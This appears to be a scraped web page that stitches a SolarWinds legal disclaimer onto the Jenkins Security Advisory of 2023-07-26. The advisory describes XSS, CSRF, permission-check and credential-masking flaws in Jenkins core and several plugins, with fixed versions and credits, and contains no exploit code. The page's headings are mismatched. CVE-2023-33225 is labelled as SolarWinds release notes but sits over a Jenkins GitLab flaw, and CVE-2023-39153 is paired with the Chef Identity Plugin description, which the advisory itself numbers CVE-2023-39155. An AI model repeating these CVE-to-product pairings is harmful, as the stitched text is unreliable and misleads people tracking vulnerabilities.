SOLARWINDS DISCLAIMS ALL WARRANTIES, CONDITIONS, OR OTHER TERMS, EXPRESS OR IMPLIED, STATUTORY OR OTHERWISE, ON THE DOCUMENTATION, INCLUDING WITHOUT LIMITATION NONINFRINGEMENT, ACCURACY, COMPLETENESS, OR USEFULNESS OF ANY INFORMATION CONTAINED HEREIN. IN NO EVENT SHALL SOLARWINDS, ITS SUPPLIERS, NOR ITS LICENSORS BE LIABLE FOR ANY DAMAGES, WHETHER ARISING IN TORT, CONTRACT OR ANY OTHER LEGAL THEORY, EVEN IF SOLARWINDS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.

The SolarWinds, SolarWinds & Design, Orion, and THWACK trademarks are the exclusive property of SolarWinds Worldwide, LLC or its affiliates, are registered with the U.S. Patent and Trademark Office, and may be registered or pending registration in other countries. All other SolarWinds trademarks, service marks, and logos may be common law marks or are registered or pending registration. All other trademarks mentioned herein are used for identification purposes only and are trademarks of (and may be registered trademarks) of their respective companies.

CVE-2023-33225: SolarWinds Platform 2023.3 Release Notes

A cross-site request forgery (CSRF) vulnerability in Jenkins GitLab Authentication Plugin 1.17.1 and earlier allows attackers to trick users into logging in to the attacker's account.

This advisory announces vulnerabilities in the following Jenkins deliverables:

*   Jenkins (core)
*   Bazaar Plugin
*   Chef Identity Plugin
*   GitLab Authentication Plugin
*   Gradle Plugin
*   Qualys Web App Scanning Connector Plugin
*   ServiceNow DevOps Plugin

**Descriptions****Stored XSS vulnerability**

**SECURITY-3188 / CVE-2023-39151**  
**Severity (CVSS):** High  
**Description:**

Jenkins applies formatting to the console output of builds, transforming plain URLs into hyperlinks.

Jenkins 2.415 and earlier, LTS 2.401.2 and earlier does not sanitize or properly encode URLs of these hyperlinks in build logs.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to control build log contents.

Jenkins 2.416, LTS 2.401.3 encodes URLs of affected hyperlink annotations in build logs.

**Incorrect control flow in Gradle Plugin breaks credentials masking in the build log**

**SECURITY-3208 / CVE-2023-39152**  
**Severity (CVSS):** Medium  
**Affected plugin: gradle**  
**Description:**

Gradle Plugin 2.8 improperly invokes APIs available only on the controller from an agent when setting up build log annotations, causing an exception.

As a result, credentials may not be masked (i.e., replaced with asterisks) in the build log in some circumstances.

Gradle Plugin 2.8.1 improves the control flow and handles the exception, so that credentials masking is not affected.

An improvement in Pipeline: API 1232.v1679fa\_2f0f76 prevents issues like this from affecting credentials masking in the future. As of the publication of this advisory, the Jenkins security team is not aware of other plugins with a similar issue.

**CSRF vulnerability in GitLab Authentication Plugin**

**SECURITY-2696 / CVE-2023-39153**  
**Severity (CVSS):** Medium  
**Affected plugin: gitlab-oauth**  
**Description:**

GitLab Authentication Plugin 1.17.1 and earlier does not implement a state parameter in its OAuth flow, a unique and non-guessable value associated with each authentication request.

This vulnerability allows attackers to trick users into logging in to the attacker’s account.

GitLab Authentication Plugin 1.18 implements a state parameter in its OAuth flow.

**CSRF vulnerability and missing permission check in ServiceNow DevOps Plugin allow capturing credentials**

**SECURITY-3129 / CVE-2023-3414 (CSRF), CVE-2023-3442 (missing permission check)**  
**Severity (CVSS):** Medium  
**Affected plugin: servicenow-devops**  
**Description:**

ServiceNow DevOps Plugin 1.38.0 and earlier does not perform a permission check in a method implementing form validation.

This allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.

Additionally, this form validation method does not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.

ServiceNow DevOps Plugin 1.38.1 requires POST requests and Overall/Administer permission for the affected form validation method.

**Incorrect permission checks in Qualys Web App Scanning Connector Plugin allow capturing credentials**

**SECURITY-3012 / CVE-2023-39154**  
**Severity (CVSS):** Medium  
**Affected plugin: qualys-was**  
**Description:**

Qualys Web App Scanning Connector Plugin 2.0.10 and earlier does not correctly perform permission checks in several HTTP endpoints.

This allows attackers with global Item/Configure permission to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.

Qualys Web App Scanning Connector Plugin 2.0.11 requires the appropriate permissions for the affected HTTP endpoints.

**Secret displayed without masking by Chef Identity Plugin**

**SECURITY-3192 / CVE-2023-39155**  
**Severity (CVSS):** Low  
**Affected plugin: chef-identity**  
**Description:**

Chef Identity Plugin stores the user.pem key in its global configuration file io.chef.jenkins.ChefIdentityBuildWrapper.xml on the Jenkins controller as part of its configuration.

While this key is stored encrypted on disk, in Chef Identity Plugin 2.0.3 and earlier the global configuration form does not mask the user.pem key form field, increasing the potential for attackers to observe and capture it.

**CSRF vulnerability in Bazaar Plugin**

**SECURITY-3095 / CVE-2023-39156**  
**Severity (CVSS):** Medium  
**Affected plugin: bazaar**  
**Description:**

Bazaar Plugin 1.22 and earlier does not require POST requests for an HTTP endpoint, resulting in a cross-site request forgery (CSRF) vulnerability.

This vulnerability allows attackers to delete previously created Bazaar SCM tags.

**Severity**

*   SECURITY-2696: Medium
*   SECURITY-3012: Medium
*   SECURITY-3095: Medium
*   SECURITY-3129: Medium
*   SECURITY-3188: High
*   SECURITY-3192: Low
*   SECURITY-3208: Medium

**Affected Versions**

*   **Jenkins weekly** up to and including 2.415
*   **Jenkins LTS** up to and including 2.401.2
*   **Bazaar Plugin** up to and including 1.22
*   **Chef Identity Plugin** up to and including 2.0.3
*   **GitLab Authentication Plugin** up to and including 1.17.1
*   **Gradle Plugin** up to and including 2.8
*   **Qualys Web App Scanning Connector Plugin** up to and including 2.0.10
*   **ServiceNow DevOps Plugin** up to and including 1.38.0

**Fix**

*   **Jenkins weekly** should be updated to version 2.416
*   **Jenkins LTS** should be updated to version 2.401.3
*   **GitLab Authentication Plugin** should be updated to version 1.18
*   **Gradle Plugin** should be updated to version 2.8.1
*   **Qualys Web App Scanning Connector Plugin** should be updated to version 2.0.11
*   **ServiceNow DevOps Plugin** should be updated to version 1.38.1

These versions include fixes to the vulnerabilities described above. All prior versions are considered to be affected by these vulnerabilities unless otherwise indicated.

As of publication of this advisory, no fixes are available for the following plugins:

*   Bazaar Plugin
*   Chef Identity Plugin

Learn why we announce these issues.

**Credit**

The Jenkins project would like to thank the reporters for discovering and reporting these vulnerabilities:

*   **Alvaro Muñoz (@pwntester), GitHub Security Lab** for SECURITY-3129
*   **Andrea Chiera, CloudBees, Inc.** for SECURITY-3192
*   **Kevin Guerroudj, CloudBees, Inc.** for SECURITY-3095
*   **Kevin Guerroudj, CloudBees, Inc. and Devin Nusbaum, CloudBees, Inc.** for SECURITY-3188
*   **Wadeck Follonier, CloudBees Inc.** for SECURITY-2696
*   **Yaroslav Afenkin, CloudBees, Inc.** for SECURITY-3012

CVE-2023-39153: Jenkins Security Advisory 2023-07-26

Jenkins Chef Identity Plugin 2.0.3 and earlier does not mask the user.pem key form field, increasing the potential for attackers to observe and capture it.

Tag

#xss